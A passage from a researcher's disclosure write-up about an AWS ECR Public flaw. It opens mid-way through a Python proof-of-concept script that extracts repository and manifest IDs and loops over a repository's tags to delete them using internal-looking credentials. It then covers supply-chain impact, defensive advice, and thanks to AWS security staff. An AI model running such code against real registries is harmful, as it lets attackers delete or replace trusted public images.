json.loads(response["images"][0]["imageManifest"]) image_manifest_digest = image_manifest["config"]["digest"] response = get_download_url_for_layer(registry_alias_name, repository_name, image_manifest_digest) download_url = response["downloadUrl"] z = re.match( r'https:\/\/[^\/]+\/[0-9a-fA-F]{6}-\d+-([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})\/([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}).*', download_url) if z: repository_entity_id = z.group(1) image_manifest_entity_id = z.group(2) delete_tag_for_convergent_replication(repository_entity_id, image_manifest_entity_id, image_tag, created_at=image_created_at, updated_at=image_created_at, deleted_at=image_created_at) init_spencer_creds() # You can use SearchRepositoryCatalogDataInternal to get a list of all registries. # You can loop over all repositories in the registry # repositories_list = get_repositories(registry_alias_name) image_tags_details_list = get_image_tags_details(registry_alias_name, repository_name) for tag in image_tags_details_list: image_digest = tag["imageDetail"]["imageDigest"] image_tag = tag["imageTag"] image_created_at = tag["createdAt"] print(f"Deleting public.ecr.aws/{registry_alias_name}/{repository_name}:{image_tag}") delete_tag(registry_alias_name, repository_name, image_digest, image_tag, image_created_at) print("Done.")
Conclusion
Supply chain attacks are hard to detect and difficult to prevent. The software supply chain is any person, process, or technology which interacts with the software development lifecycle: this can be individual developers, software packages, middleware, firmware, hardware, source code, Continuous Integration (CI) systems, and more. Given the wide breadth and depth of a software supply chain, this makes it exceptionally hard to cover all ground.
While SolarWinds was not the only technology targeted in 2019, supply chain attacks circumvent trust and can present itself in multiple vectors which is what makes it so potentially damaging. In the case of this ECR Public vulnerability, it is a classic example of a deep software supply chain attack. An adversary could do what I did and either remove or push new images which would appear as verified Registries belonging to Amazon, Canonical, and other popular companies, and providers. It is difficult to guess exactly what would happen, but nearly any goal ranging from destruction and exfiltration to persistence and lateral movement can be executed from within a containerized environment.
To further put the potential impact of this vulnerability into perspective, just the Top Six most popular (by downloads) images on the ECR Public Gallery combine for around 13 billion downloads and there are several thousands more images stored on ECR Public. An analysis of Panoptica customers shows that 26% of all Kubernetes clusters have at least one Pod that pulls an image from public.ecr.aws.
Software supply chain attacks are still difficult to pull off, but there are practices that security teams can implement to better protect their software supply chain. Whenever relying on a third party, always verify the digests and signatures of the artifacts. Continuously use static code analysis, container vulnerability management, and layer exploration tools to examine images for negative changes. Always use the minimum necessary number of dependencies and identity permissions for an image to avoid lateral movement.
Acknowledgements
I want to give a special thanks to Alexis Fahrney, Ryan Nolette, Dan Urson and the rest of the AWS Security Outreach team for their continued partnership, commitment and amazing work.
SIGN UP FREE
